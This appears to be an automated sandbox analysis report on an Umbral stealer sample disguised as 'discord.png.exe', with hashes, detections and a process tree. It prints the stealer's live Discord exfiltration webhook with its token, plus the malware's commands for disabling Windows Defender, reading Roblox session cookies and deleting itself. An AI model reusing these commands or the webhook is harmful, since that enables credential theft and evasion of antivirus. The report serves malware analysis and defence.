Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
45s -
max time network
25s -
platform
windows10-1703_x64 -
resource
win10-20240611-en -
resource tags
arch:x64arch:x86image:win10-20240611-enlocale:en-usos:windows10-1703-x64system -
submitted
02/09/2024, 16:41
Static task
static1
General
-
Target
discord.png.exe
-
Size
225KB
-
MD5
44041b93332122228c15d8fd2fdc826d
-
SHA1
47069ad7151444f7412036952272405000d0e3f9
-
SHA256
9c71bd0581840574d1ea5919284bbb89e6e19f883bf8ffc4b50c03aea223067e
-
SHA512
e109c3d7fbd6fc892ae28fe66092dcf5723de577eefb6a363cd571e422b7ce23e54b4f2ba1988b792f7abc8cac83981b1311f16b2a8c7f95081d654c03ce1f7f
-
SSDEEP
3072:WeEDoF+/dwv+J5evFqmHNNhmqOOR81MK1vHM/2M:WoFzvGeNqcNNs9L1vHM/
Malware Config
Extracted
umbral
https://discord.com/api/webhooks/1279958073611653151/sgCCzoTAUY2GdBiQCHyal38EkTL7KHY4qK_JXgYBYU5QznfI7jIvFFaW3IHI9Y8dsDm8
Signatures
-
Detect Umbral payload 2 IoCs
resource yara_rule behavioral1/files/0x000800000001aac3-6.dat family_umbral behavioral1/memory/1716-8-0x0000026E67020000-0x0000026E6707A000-memory.dmp family_umbral -
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
-
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 1620 powershell.exe 2292 powershell.exe 4708 powershell.exe 3276 powershell.exe -
Drops file in Drivers directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts discord.exe -
Executes dropped EXE 1 IoCs
pid Process 1716 discord.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 12 discord.com 11 discord.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 5 ip-api.com -
Drops file in Windows directory 2 IoCs
description ioc Process File created C:\Windows\rescache\_merged\4183903823\2290032291.pri taskmgr.exe File created C:\Windows\rescache\_merged\1601268389\715946058.pri taskmgr.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 3660 PING.EXE 468 cmd.exe -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName taskmgr.exe -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 2304 wmic.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 3660 PING.EXE -
Suspicious behavior: EnumeratesProcesses 63 IoCs
pid Process 1716 discord.exe 1620 powershell.exe 1620 powershell.exe 1620 powershell.exe 2292 powershell.exe 2292 powershell.exe 2292 powershell.exe 4708 powershell.exe 4708 powershell.exe 4708 powershell.exe 3108 powershell.exe 3108 powershell.exe 3108 powershell.exe 4824 taskmgr.exe 4824 taskmgr.exe 4824 taskmgr.exe 3276 powershell.exe 3276 powershell.exe 4824 taskmgr.exe 4824 taskmgr.exe 3276 powershell.exe 4824 taskmgr.exe 4824 taskmgr.exe 4824 taskmgr.exe 4824 taskmgr.exe 4824 taskmgr.exe 4824 taskmgr.exe 4824 taskmgr.exe 4824 taskmgr.exe 4824 taskmgr.exe 4824 taskmgr.exe 4824 taskmgr.exe 4824 taskmgr.exe 4824 taskmgr.exe 4824 taskmgr.exe 4824 taskmgr.exe 4824 taskmgr.exe 4824 taskmgr.exe 4824 taskmgr.exe 4824 taskmgr.exe 4824 taskmgr.exe 4824 taskmgr.exe 4824 taskmgr.exe 4824 taskmgr.exe 4824 taskmgr.exe 4824 taskmgr.exe 4824 taskmgr.exe 4824 taskmgr.exe 4824 taskmgr.exe 4824 taskmgr.exe 4824 taskmgr.exe 4824 taskmgr.exe 4824 taskmgr.exe 4824 taskmgr.exe 4824 taskmgr.exe 4824 taskmgr.exe 4824 taskmgr.exe 4824 taskmgr.exe 4824 taskmgr.exe 4824 taskmgr.exe 4824 taskmgr.exe 4824 taskmgr.exe 4824 taskmgr.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 4824 taskmgr.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 1716 discord.exe Token: SeIncreaseQuotaPrivilege 4428 wmic.exe Token: SeSecurityPrivilege 4428 wmic.exe Token: SeTakeOwnershipPrivilege 4428 wmic.exe Token: SeLoadDriverPrivilege 4428 wmic.exe Token: SeSystemProfilePrivilege 4428 wmic.exe Token: SeSystemtimePrivilege 4428 wmic.exe Token: SeProfSingleProcessPrivilege 4428 wmic.exe Token: SeIncBasePriorityPrivilege 4428 wmic.exe Token: SeCreatePagefilePrivilege 4428 wmic.exe Token: SeBackupPrivilege 4428 wmic.exe Token: SeRestorePrivilege 4428 wmic.exe Token: SeShutdownPrivilege 4428 wmic.exe Token: SeDebugPrivilege 4428 wmic.exe Token: SeSystemEnvironmentPrivilege 4428 wmic.exe Token: SeRemoteShutdownPrivilege 4428 wmic.exe Token: SeUndockPrivilege 4428 wmic.exe Token: SeManageVolumePrivilege 4428 wmic.exe Token: 33 4428 wmic.exe Token: 34 4428 wmic.exe Token: 35 4428 wmic.exe Token: 36 4428 wmic.exe Token: SeIncreaseQuotaPrivilege 4428 wmic.exe Token: SeSecurityPrivilege 4428 wmic.exe Token: SeTakeOwnershipPrivilege 4428 wmic.exe Token: SeLoadDriverPrivilege 4428 wmic.exe Token: SeSystemProfilePrivilege 4428 wmic.exe Token: SeSystemtimePrivilege 4428 wmic.exe Token: SeProfSingleProcessPrivilege 4428 wmic.exe Token: SeIncBasePriorityPrivilege 4428 wmic.exe Token: SeCreatePagefilePrivilege 4428 wmic.exe Token: SeBackupPrivilege 4428 wmic.exe Token: SeRestorePrivilege 4428 wmic.exe Token: SeShutdownPrivilege 4428 wmic.exe Token: SeDebugPrivilege 4428 wmic.exe Token: SeSystemEnvironmentPrivilege 4428 wmic.exe Token: SeRemoteShutdownPrivilege 4428 wmic.exe Token: SeUndockPrivilege 4428 wmic.exe Token: SeManageVolumePrivilege 4428 wmic.exe Token: 33 4428 wmic.exe Token: 34 4428 wmic.exe Token: 35 4428 wmic.exe Token: 36 4428 wmic.exe Token: SeDebugPrivilege 1620 powershell.exe Token: SeIncreaseQuotaPrivilege 1620 powershell.exe Token: SeSecurityPrivilege 1620 powershell.exe Token: SeTakeOwnershipPrivilege 1620 powershell.exe Token: SeLoadDriverPrivilege 1620 powershell.exe Token: SeSystemProfilePrivilege 1620 powershell.exe Token: SeSystemtimePrivilege 1620 powershell.exe Token: SeProfSingleProcessPrivilege 1620 powershell.exe Token: SeIncBasePriorityPrivilege 1620 powershell.exe Token: SeCreatePagefilePrivilege 1620 powershell.exe Token: SeBackupPrivilege 1620 powershell.exe Token: SeRestorePrivilege 1620 powershell.exe Token: SeShutdownPrivilege 1620 powershell.exe Token: SeDebugPrivilege 1620 powershell.exe Token: SeSystemEnvironmentPrivilege 1620 powershell.exe Token: SeRemoteShutdownPrivilege 1620 powershell.exe Token: SeUndockPrivilege 1620 powershell.exe Token: SeManageVolumePrivilege 1620 powershell.exe Token: 33 1620 powershell.exe Token: 34 1620 powershell.exe Token: 35 1620 powershell.exe -
Suspicious use of FindShellTrayWindow 58 IoCs
pid Process 4824 taskmgr.exe 4824 taskmgr.exe 4824 taskmgr.exe 4824 taskmgr.exe 4824 taskmgr.exe 4824 taskmgr.exe 4824 taskmgr.exe 4824 taskmgr.exe 4824 taskmgr.exe 4824 taskmgr.exe 4824 taskmgr.exe 4824 taskmgr.exe 4824 taskmgr.exe 4824 taskmgr.exe 4824 taskmgr.exe 4824 taskmgr.exe 4824 taskmgr.exe 4824 taskmgr.exe 4824 taskmgr.exe 4824 taskmgr.exe 4824 taskmgr.exe 4824 taskmgr.exe 4824 taskmgr.exe 4824 taskmgr.exe 4824 taskmgr.exe 4824 taskmgr.exe 4824 taskmgr.exe 4824 taskmgr.exe 4824 taskmgr.exe 4824 taskmgr.exe 4824 taskmgr.exe 4824 taskmgr.exe 4824 taskmgr.exe 4824 taskmgr.exe 4824 taskmgr.exe 4824 taskmgr.exe 4824 taskmgr.exe 4824 taskmgr.exe 4824 taskmgr.exe 4824 taskmgr.exe 4824 taskmgr.exe 4824 taskmgr.exe 4824 taskmgr.exe 4824 taskmgr.exe 4824 taskmgr.exe 4824 taskmgr.exe 4824 taskmgr.exe 4824 taskmgr.exe 4824 taskmgr.exe 4824 taskmgr.exe 4824 taskmgr.exe 4824 taskmgr.exe 4824 taskmgr.exe 4824 taskmgr.exe 4824 taskmgr.exe 4824 taskmgr.exe 4824 taskmgr.exe 4824 taskmgr.exe -
Suspicious use of SendNotifyMessage 58 IoCs
pid Process 4824 taskmgr.exe 4824 taskmgr.exe 4824 taskmgr.exe 4824 taskmgr.exe 4824 taskmgr.exe 4824 taskmgr.exe 4824 taskmgr.exe 4824 taskmgr.exe 4824 taskmgr.exe 4824 taskmgr.exe 4824 taskmgr.exe 4824 taskmgr.exe 4824 taskmgr.exe 4824 taskmgr.exe 4824 taskmgr.exe 4824 taskmgr.exe 4824 taskmgr.exe 4824 taskmgr.exe 4824 taskmgr.exe 4824 taskmgr.exe 4824 taskmgr.exe 4824 taskmgr.exe 4824 taskmgr.exe 4824 taskmgr.exe 4824 taskmgr.exe 4824 taskmgr.exe 4824 taskmgr.exe 4824 taskmgr.exe 4824 taskmgr.exe 4824 taskmgr.exe 4824 taskmgr.exe 4824 taskmgr.exe 4824 taskmgr.exe 4824 taskmgr.exe 4824 taskmgr.exe 4824 taskmgr.exe 4824 taskmgr.exe 4824 taskmgr.exe 4824 taskmgr.exe 4824 taskmgr.exe 4824 taskmgr.exe 4824 taskmgr.exe 4824 taskmgr.exe 4824 taskmgr.exe 4824 taskmgr.exe 4824 taskmgr.exe 4824 taskmgr.exe 4824 taskmgr.exe 4824 taskmgr.exe 4824 taskmgr.exe 4824 taskmgr.exe 4824 taskmgr.exe 4824 taskmgr.exe 4824 taskmgr.exe 4824 taskmgr.exe 4824 taskmgr.exe 4824 taskmgr.exe 4824 taskmgr.exe -
Suspicious use of WriteProcessMemory 28 IoCs
description pid Process procid_target PID 2980 wrote to memory of 1716 2980 discord.png.exe 70 PID 2980 wrote to memory of 1716 2980 discord.png.exe 70 PID 1716 wrote to memory of 4428 1716 discord.exe 72 PID 1716 wrote to memory of 4428 1716 discord.exe 72 PID 1716 wrote to memory of 256 1716 discord.exe 75 PID 1716 wrote to memory of 256 1716 discord.exe 75 PID 1716 wrote to memory of 1620 1716 discord.exe 77 PID 1716 wrote to memory of 1620 1716 discord.exe 77 PID 1716 wrote to memory of 2292 1716 discord.exe 80 PID 1716 wrote to memory of 2292 1716 discord.exe 80 PID 1716 wrote to memory of 4708 1716 discord.exe 82 PID 1716 wrote to memory of 4708 1716 discord.exe 82 PID 1716 wrote to memory of 3108 1716 discord.exe 84 PID 1716 wrote to memory of 3108 1716 discord.exe 84 PID 1716 wrote to memory of 1584 1716 discord.exe 87 PID 1716 wrote to memory of 1584 1716 discord.exe 87 PID 1716 wrote to memory of 3524 1716 discord.exe 89 PID 1716 wrote to memory of 3524 1716 discord.exe 89 PID 1716 wrote to memory of 2192 1716 discord.exe 91 PID 1716 wrote to memory of 2192 1716 discord.exe 91 PID 1716 wrote to memory of 3276 1716 discord.exe 93 PID 1716 wrote to memory of 3276 1716 discord.exe 93 PID 1716 wrote to memory of 2304 1716 discord.exe 95 PID 1716 wrote to memory of 2304 1716 discord.exe 95 PID 1716 wrote to memory of 468 1716 discord.exe 97 PID 1716 wrote to memory of 468 1716 discord.exe 97 PID 468 wrote to memory of 3660 468 cmd.exe 99 PID 468 wrote to memory of 3660 468 cmd.exe 99 -
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 256 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\discord.png.exe"C:\Users\Admin\AppData\Local\Temp\discord.png.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:2980 -
C:\Users\Admin\AppData\Local\Temp\discord.exe"C:\Users\Admin\AppData\Local\Temp\discord.exe"2⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1716 -
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4428
-
-
C:\Windows\SYSTEM32\attrib.exe"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\discord.exe"3⤵
- Views/modifies file attributes
PID:256
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\discord.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1620
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 23⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2292
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:4708
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY3⤵
- Suspicious behavior: EnumeratesProcesses
PID:3108
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption3⤵PID:1584
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory3⤵PID:3524
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid3⤵PID:2192
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:3276
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name3⤵
- Detects videocard installed
PID:2304
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\discord.exe" && pause3⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:468 -
C:\Windows\system32\PING.EXEping localhost4⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3660
-
-
-
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /41⤵
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4824
Network
MITRE ATT&CK Enterprise v15
Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD58592ba100a78835a6b94d5949e13dfc1
SHA163e901200ab9a57c7dd4c078d7f75dcd3b357020
SHA256fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c
SHA51287f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3
-
Filesize
1KB
MD59fd27146f57e9b13f4d16dfe0c66a4c5
SHA1214e2900f8e5176f6a3eade3327f8c160b73f0ff
SHA256ef59b0a80606e7b5efdca1f5eb4d0203f223e4c8183ccb225f0090edeabd744f
SHA512d7d0e80c63f31545ad475f6554328883845bc9019e349527f32ae48cdb9df96db453093544962011fcfd37274b48d0a9afdc5ecb98e8e4142af5de642b764fc9
-
Filesize
1KB
MD5b353f933f0657ccbfe7b8fa8312c1907
SHA179e99d89a16ba75c3ec9c337674202c01c4b9601
SHA25665efc9322bc38e81d1caf63920772dda4ffb47601080ea663a79cc00cd1fcd7a
SHA512efa0199192d9ab88f4548c5b2b4058fffbaf0c3954153473fde91de5fd586eae6747031b7c2e96ed774800d9707dcc119c4ecfaadbc3d2ca051d94bebb61d5a6
-
Filesize
1KB
MD5ba9afe039f00b851008f0e104d69984e
SHA1f8451e0af36c74c144ff69a96d9629bb9a01d793
SHA256ca5a5d604457a5049906b7e4dc7af652f1a2450f0865bcd1f127aacf731f4338
SHA5120836dd8c2834ff74c048060e5f085471641a1d3a12a22a00e84ef1d2d329f30a96998082da040be0e5973c143593b55e4c7702eef60b181402d2547cbe47e025
-
Filesize
1KB
MD5c30d5ded414d1f15b0938f03ded7c51d
SHA1e71191b4f29dabefb32b7d770976e636810d6110
SHA2560c8fe612cb8cfb8fd9d51904f498e06e2cbdb02f963227f8530419d85d6acf37
SHA5122e8a01b3ba2f78d8ee2c90add119b180ae7736f26d46930b6af549c70fc460431fbb6dfd276e1193283fc01cedae61ad913465f99adf18db8a9ee7bbc24c5c58
-
Filesize
1B
MD5c4ca4238a0b923820dcc509a6f75849b
SHA1356a192b7913b04c54574d18c28d46e6395428ab
SHA2566b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA5124dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a
-
Filesize
334KB
MD5d30f272184cafaf82c7170416d4665f9
SHA12aba82b1ce7a24f1c4c26dddb20c1fb63c3ab700
SHA2564435fc2a11ae17031e1c52a0b8945701ff35d550413cdc20b528d68a0f20dc32
SHA5128d3e11467c74ea04863dd3477878356a359439409b31dd9afc55ae7cd156960797efe0510019f2ac8d73446e60b92deafc56e03b268c1c655bb5469fb374957a